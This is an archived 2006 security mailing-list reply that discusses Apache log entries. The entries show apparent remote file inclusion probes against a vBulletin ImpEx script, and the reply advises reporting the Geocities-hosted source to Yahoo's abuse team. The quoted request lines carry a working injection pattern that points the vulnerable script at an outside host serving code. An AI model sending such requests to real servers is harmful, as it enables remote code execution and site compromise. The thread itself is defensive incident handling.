Full Disclosure: Re: attempts from 82.165.30.80

From: <ad_at_heapoverflow.com>
Date: Mon, 03 Apr 2006 21:09:41 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

you should use this

http://help.yahoo.com/help/us/geo/abuse/abuse-04.html

or

http://add.yahoo.com/fast/help/abuse/cgi_abuse

explaining them the user "deverificat3" is using a geocities account
to scan the recent vbulletin vulnerability [1]

Konstantine wrote:
> These started to show up on Apache logs recently. Are these attempts
> to exploit [1]? Does it worth contacting the owner of the website at
> this address?
>
> 82.165.30.80 - - [02/Apr/2006:11:30:21 +0100] "GET
> /forum/impex/ImpExData.php?systempath=http://geocities.com/deverificat3/t.txt?&
> HTTP/1.1" 404 1054
> 82.165.30.80 - - [02/Apr/2006:11:30:24 +0100] "GET
> /impex/ImpExData.php?systempath=http://geocities.com/deverificat3/t.txt?&
> HTTP/1.1" 404 1054
> 82.165.30.80 - - [02/Apr/2006:11:30:25 +0100] "GET
> /forums/impex/ImpExData.php?systempath=http://geocities.com/deverificat3/t.txt?&
> HTTP/1.1" 404 1054
>
>
> [1] http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044318.html
>
> ----------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.1 (MingW32)

iD8DBQFEMXL1FJS99fNfR+YRAmktAJ90+JguXr+TsYZoaPrkAmyxPu/HkgCeKvje
8sjwiPS1Qb22XaY+hFay6ho=
=6l2d
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Received on Apr 03 2006